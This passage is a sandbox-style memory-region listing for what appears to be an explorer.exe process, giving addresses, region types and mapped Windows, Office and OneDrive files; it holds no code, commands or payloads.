Region: id = 8378 start_va = 0x56e0000 end_va = 0x56e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000056e0000" filename = "" Region: id = 8379 start_va = 0x5720000 end_va = 0x5723fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005720000" filename = "" Region: id = 8380 start_va = 0x5730000 end_va = 0x5734fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 8381 start_va = 0x5740000 end_va = 0x574ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 8382 start_va = 0x5750000 end_va = 0x5751fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 8383 start_va = 0x5760000 end_va = 0x5761fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005760000" filename = "" Region: id = 8384 start_va = 0x5770000 end_va = 0x5771fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005770000" filename = "" Region: id = 8385 start_va = 0x5780000 end_va = 0x5781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 8386 start_va = 0x5790000 end_va = 0x5790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005790000" filename = "" Region: id = 8387 start_va = 0x57a0000 end_va = 0x57e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000057a0000" filename = "" Region: id = 8388 start_va = 0x57f0000 end_va = 0x57f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000057f0000" filename = "" Region: id = 8389 start_va = 0x5800000 end_va = 0x5801fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005800000" filename = "" Region: id = 8390 start_va = 0x5810000 end_va = 0x5810fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005810000" filename = "" Region: id = 8391 start_va = 0x5830000 end_va = 0x583dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005830000" filename = "" Region: id = 8392 start_va = 0x5870000 end_va = 0x7bf1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 8393 start_va = 0x7c00000 end_va = 0x7c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 8394 start_va = 0x7c80000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c80000" filename = "" Region: id = 8395 start_va = 0x7d00000 end_va = 0x7d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d00000" filename = "" Region: id = 8396 start_va = 0x7e00000 end_va = 0x7e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e00000" filename = "" Region: id = 8397 start_va = 0x7e80000 end_va = 0x7efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e80000" filename = "" Region: id = 8398 start_va = 0x7f00000 end_va = 0x7f47fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f00000" filename = "" Region: id = 8399 start_va = 0x7f50000 end_va = 0x7f51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f50000" filename = "" Region: id = 8400 start_va = 0x7f60000 end_va = 0x7f61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f60000" filename = "" Region: id = 8401 start_va = 0x7f70000 end_va = 0x7f70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f70000" filename = "" Region: id = 8402 start_va = 0x7f80000 end_va = 0x7f81fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 8403 start_va = 0x7f90000 end_va = 0x7f91fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f90000" filename = "" Region: id = 8404 start_va = 0x7fa0000 end_va = 0x7fa1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007fa0000" filename = "" Region: id = 8405 start_va = 0x7fb0000 end_va = 0x7fb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007fb0000" filename = "" Region: id = 8406 start_va = 0x7fc0000 end_va = 0x7fc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007fc0000" filename = "" Region: id = 8407 start_va = 0x7fd0000 end_va = 0x7fd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007fd0000" filename = "" Region: id = 8408 start_va = 0x7fe0000 end_va = 0x7fe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007fe0000" filename = "" Region: id = 8409 start_va = 0x7ff0000 end_va = 0x7ff8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ff0000" filename = "" Region: id = 8410 start_va = 0x8000000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 8411 start_va = 0x8100000 end_va = 0x8101fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008100000" filename = "" Region: id = 8412 start_va = 0x8110000 end_va = 0x8157fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008110000" filename = "" Region: id = 8413 start_va = 0x8160000 end_va = 0x8163fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 8414 start_va = 0x8170000 end_va = 0x8171fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008170000" filename = "" Region: id = 8415 start_va = 0x8180000 end_va = 0x8181fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008180000" filename = "" Region: id = 8416 start_va = 0x8190000 end_va = 0x8191fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008190000" filename = "" Region: id = 8417 start_va = 0x81a0000 end_va = 0x81a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000081a0000" filename = "" Region: id = 8418 start_va = 0x81b0000 end_va = 0x8297fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000081b0000" filename = "" Region: id = 8419 start_va = 0x86b0000 end_va = 0x872ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086b0000" filename = "" Region: id = 8420 start_va = 0x8730000 end_va = 0x87affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008730000" filename = "" Region: id = 8421 start_va = 0x87b0000 end_va = 0x882ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087b0000" filename = "" Region: id = 8422 start_va = 0x8830000 end_va = 0x88affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008830000" filename = "" Region: id = 8423 start_va = 0x88b0000 end_va = 0x88b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088b0000" filename = "" Region: id = 8424 start_va = 0x88c0000 end_va = 0x893ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088c0000" filename = "" Region: id = 8425 start_va = 0x8940000 end_va = 0x8b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008940000" filename = "" Region: id = 8426 start_va = 0x8b40000 end_va = 0x8bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b40000" filename = "" Region: id = 8427 start_va = 0x8bc0000 end_va = 0x8bc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008bc0000" filename = "" Region: id = 8428 start_va = 0x8bd0000 end_va = 0x8bd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008bd0000" filename = "" Region: id = 8429 start_va = 0x8c40000 end_va = 0x8cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c40000" filename = "" Region: id = 8430 start_va = 0x8cc0000 end_va = 0x8d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 8431 start_va = 0x8d40000 end_va = 0x8dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d40000" filename = "" Region: id = 8432 start_va = 0x8e40000 end_va = 0x8ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e40000" filename = "" Region: id = 8433 start_va = 0x8ec0000 end_va = 0x8f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ec0000" filename = "" Region: id = 8434 start_va = 0x8f40000 end_va = 0x8fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f40000" filename = "" Region: id = 8435 start_va = 0x8fc0000 end_va = 0x903ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008fc0000" filename = "" Region: id = 8436 start_va = 0x9040000 end_va = 0x90bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009040000" filename = "" Region: id = 8437 start_va = 0x90c0000 end_va = 0x913ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090c0000" filename = "" Region: id = 8438 start_va = 0x9140000 end_va = 0x91bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009140000" filename = "" Region: id = 8439 start_va = 0x91c0000 end_va = 0x923ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000091c0000" filename = "" Region: id = 8440 start_va = 0x9240000 end_va = 0x92bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009240000" filename = "" Region: id = 8441 start_va = 0x92c0000 end_va = 0x933ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000092c0000" filename = "" Region: id = 8442 start_va = 0x9340000 end_va = 0x93bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009340000" filename = "" Region: id = 8443 start_va = 0x93c0000 end_va = 0x943ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000093c0000" filename = "" Region: id = 8444 start_va = 0x9440000 end_va = 0x95f8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 8445 start_va = 0x9600000 end_va = 0x967ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009600000" filename = "" Region: id = 8446 start_va = 0x9680000 end_va = 0x96fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009680000" filename = "" Region: id = 8447 start_va = 0x9780000 end_va = 0x97fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009780000" filename = "" Region: id = 8448 start_va = 0x9800000 end_va = 0x987ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009800000" filename = "" Region: id = 8449 start_va = 0x9880000 end_va = 0x997ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 8450 start_va = 0x9980000 end_va = 0x9a7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 8451 start_va = 0x9a80000 end_va = 0x9b7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 8452 start_va = 0x9b80000 end_va = 0x9bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b80000" filename = "" Region: id = 8453 start_va = 0x9c00000 end_va = 0x9ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c00000" filename = "" Region: id = 8454 start_va = 0xa000000 end_va = 0xa2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a000000" filename = "" Region: id = 8455 start_va = 0xa300000 end_va = 0xcf1dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 8456 start_va = 0xcf20000 end_va = 0xcf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf20000" filename = "" Region: id = 8457 start_va = 0xd9a0000 end_va = 0xda1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d9a0000" filename = "" Region: id = 8458 start_va = 0xdba0000 end_va = 0xdc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dba0000" filename = "" Region: id = 8459 start_va = 0xdc20000 end_va = 0xdc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dc20000" filename = "" Region: id = 8460 start_va = 0xdca0000 end_va = 0xdd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dca0000" filename = "" Region: id = 8461 start_va = 0xdd20000 end_va = 0xdd9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dd20000" filename = "" Region: id = 8462 start_va = 0xdda0000 end_va = 0xde1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dda0000" filename = "" Region: id = 8463 start_va = 0xde20000 end_va = 0xde9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000de20000" filename = "" Region: id = 8464 start_va = 0xdea0000 end_va = 0xdf1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dea0000" filename = "" Region: id = 8465 start_va = 0xdf20000 end_va = 0xdf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000df20000" filename = "" Region: id = 8466 start_va = 0xdfa0000 end_va = 0xe09ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dfa0000" filename = "" Region: id = 8467 start_va = 0xe120000 end_va = 0xe19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e120000" filename = "" Region: id = 8468 start_va = 0xe1a0000 end_va = 0xe21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e1a0000" filename = "" Region: id = 8469 start_va = 0xe220000 end_va = 0xe29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e220000" filename = "" Region: id = 8470 start_va = 0xe2a0000 end_va = 0xe39ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 8471 start_va = 0xe3a0000 end_va = 0xe41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e3a0000" filename = "" Region: id = 8472 start_va = 0xe420000 end_va = 0xe49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e420000" filename = "" Region: id = 8473 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8474 start_va = 0x180000000 end_va = 0x18087dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 8475 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 8476 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 8477 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 8478 start_va = 0x7ff6022e0000 end_va = 0x7ff602727fff monitored = 0 entry_point = 0x7ff60237e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 8479 start_va = 0x7ffd93330000 end_va = 0x7ffd93675fff monitored = 0 entry_point = 0x7ffd93338530 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 8480 start_va = 0x7ffd93680000 end_va = 0x7ffd9383ffff monitored = 0 entry_point = 0x7ffd93689e40 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 8481 start_va = 0x7ffd93840000 end_va = 0x7ffd938c7fff monitored = 0 entry_point = 0x7ffd93854510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 8482 start_va = 0x7ffd938d0000 end_va = 0x7ffd93b12fff monitored = 0 entry_point = 0x7ffd938d36c0 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 8483 start_va = 0x7ffd93ba0000 end_va = 0x7ffd93beffff monitored = 0 entry_point = 0x7ffd93babe50 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 8484 start_va = 0x7ffd93bf0000 end_va = 0x7ffd93c31fff monitored = 0 entry_point = 0x7ffd93bf2230 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 8485 start_va = 0x7ffd93c40000 end_va = 0x7ffd93cb8fff monitored = 0 entry_point = 0x7ffd93c422d0 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 8486 start_va = 0x7ffd93cc0000 end_va = 0x7ffd93d3afff monitored = 0 entry_point = 0x7ffd93cc3af0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 8487 start_va = 0x7ffd93d40000 end_va = 0x7ffd93e99fff monitored = 0 entry_point = 0x7ffd93d44610 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 8488 start_va = 0x7ffd93ea0000 end_va = 0x7ffd9409dfff monitored = 0 entry_point = 0x7ffd93ea16c0 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 8489 start_va = 0x7ffd940a0000 end_va = 0x7ffd94103fff monitored = 0 entry_point = 0x7ffd940a6b20 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 8490 start_va = 0x7ffd95200000 end_va = 0x7ffd95216fff monitored = 0 entry_point = 0x7ffd95202790 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 8491 start_va = 0x7ffd95220000 end_va = 0x7ffd9522ffff monitored = 0 entry_point = 0x7ffd952278e0 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 8492 start_va = 0x7ffd95c80000 end_va = 0x7ffd95c9efff monitored = 0 entry_point = 0x7ffd95c837e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 8493 start_va = 0x7ffd95ca0000 end_va = 0x7ffd95d18fff monitored = 0 entry_point = 0x7ffd95ca76a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 8494 start_va = 0x7ffd978f0000 end_va = 0x7ffd97b8ffff monitored = 0 entry_point = 0x7ffd978f51e0 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 8495 start_va = 0x7ffd97df0000 end_va = 0x7ffd97e37fff monitored = 0 entry_point = 0x7ffd97dfa430 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 8496 start_va = 0x7ffd98050000 end_va = 0x7ffd98064fff monitored = 0 entry_point = 0x7ffd98055740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 8497 start_va = 0x7ffd9b610000 end_va = 0x7ffd9b7c7fff monitored = 0 entry_point = 0x7ffd9b67e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 8498 start_va = 0x7ffd9ce90000 end_va = 0x7ffd9cfe3fff monitored = 0 entry_point = 0x7ffd9ce97d6c region_type = mapped_file name = "msoshext.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\msoshext.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msoshext.dll") Region: id = 8499 start_va = 0x7ffd9d040000 end_va = 0x7ffd9d08afff monitored = 0 entry_point = 0x7ffd9d051590 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 8500 start_va = 0x7ffd9d100000 end_va = 0x7ffd9d108fff monitored = 0 entry_point = 0x7ffd9d101b60 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 8501 start_va = 0x7ffd9d2f0000 end_va = 0x7ffd9d303fff monitored = 0 entry_point = 0x7ffd9d2f3710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 8502 start_va = 0x7ffd9d3a0000 end_va = 0x7ffd9d3dffff monitored = 0 entry_point = 0x7ffd9d3b6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 8503 start_va = 0x7ffd9d3e0000 end_va = 0x7ffd9d416fff monitored = 0 entry_point = 0x7ffd9d3e20a0 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 8504 start_va = 0x7ffd9d420000 end_va = 0x7ffd9d759fff monitored = 0 entry_point = 0x7ffd9d428520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 8505 start_va = 0x7ffd9d760000 end_va = 0x7ffd9d7fdfff monitored = 0 entry_point = 0x7ffd9d7a9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 8506 start_va = 0x7ffd9d800000 end_va = 0x7ffd9d816fff monitored = 0 entry_point = 0x7ffd9d80c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 8507 start_va = 0x7ffd9d820000 end_va = 0x7ffd9da33fff monitored = 0 entry_point = 0x7ffd9d821000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 8508 start_va = 0x7ffd9da40000 end_va = 0x7ffd9dccdfff monitored = 0 entry_point = 0x7ffd9db10f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 8509 start_va = 0x7ffd9dcd0000 end_va = 0x7ffd9dcd9fff monitored = 0 entry_point = 0x7ffd9dcd1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 8510 start_va = 0x7ffd9dce0000 end_va = 0x7ffd9ddcefff monitored = 0 entry_point = 0x7ffd9dd029cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll") Region: id = 8511 start_va = 0x7ffd9ddd0000 end_va = 0x7ffd9de75fff monitored = 0 entry_point = 0x7ffd9de1efec region_type = mapped_file name = "msvcp120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll") Region: id = 8512 start_va = 0x7ffd9de80000 end_va = 0x7ffd9e00efff monitored = 0 entry_point = 0x7ffd9de901d8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\filesyncshell64.dll") Region: id = 8513 start_va = 0x7ffd9e010000 end_va = 0x7ffd9e031fff monitored = 0 entry_point = 0x7ffd9e012580 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 8514 start_va = 0x7ffd9e040000 end_va = 0x7ffd9e055fff monitored = 0 entry_point = 0x7ffd9e041d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 8515 start_va = 0x7ffd9e070000 end_va = 0x7ffd9e218fff monitored = 0 entry_point = 0x7ffd9e0c4060 region_type = mapped_file name = "gdiplus.dll" filename = 